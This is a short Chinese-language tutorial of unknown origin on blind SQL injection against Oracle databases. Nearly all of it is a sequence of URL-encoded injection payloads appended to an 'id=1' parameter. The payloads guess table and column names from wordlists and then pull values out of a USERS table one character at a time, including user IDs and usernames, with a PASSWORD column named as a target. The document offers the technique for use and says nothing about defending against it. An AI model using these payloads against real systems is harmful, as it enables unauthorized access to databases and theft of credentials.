Oracle的SQL盲注入[出处未知]盲注入_BlindInject,请参考0x90.org的papers
1.详细,from Absinthe@0x90.org
2.快速,from google+CROWBAR
id=1+and+(select+count(*)+from+users)>0
id=1+and+(select+count(*)+from+##1##)>0
(##1##是从file里读取的表名文件)
id=1+and+(select+count(userid)+from+users)>0
id=1+and+(select+count(##2##)+from+##1##)>0
(##1##是从file里读取的存在表名文件,##2##也是从file里读取的列名文件)
这样就知道了可能存在的表名以及其列名了,比如USERS(USERID,USERNAME,PASSWORD)
读取数据是关键一步,Oracle的float和varchar数据类型都可以进行比大小,很方便进行数据的逐个读取
id=1+and+(select+length(userid)+from+users)>1
id=1+and+(select+length(userid)+from+users)%3d##1##
(##1##是数字1-32)
id=1+and+(SELECT+ASCII(SUBSTR(TO_CHAR(USERID)%2c1%2c1))+FROM+USERS)%3d48
id=1+and+(SELECT+ASCII(SUBSTR(TO_CHAR(MIN(USERID))%2c##2##%2c1))+FROM+USERS+WHERE+USERID>'0')%3d##1##
(##1##是数字48-123,为字母加数字;##2##是数字1-32,为USERID的长度)
id=1+and+(SELECT+ASCII(SUBSTR(TO_CHAR(MIN(USERID))%2c##2##%2c1))+FROM+USERS+WHERE+USERID>'LASTUSERID')%3d##1##
(LASTUSERID就是前面一个获得的USERID)
id=1+and+(SELECT+ASCII(SUBSTR(TO_CHAR(MIN(USERNAME))%2c##2##%2c1))+FROM+USERS+WHERE+USERID='31245')%3d##1##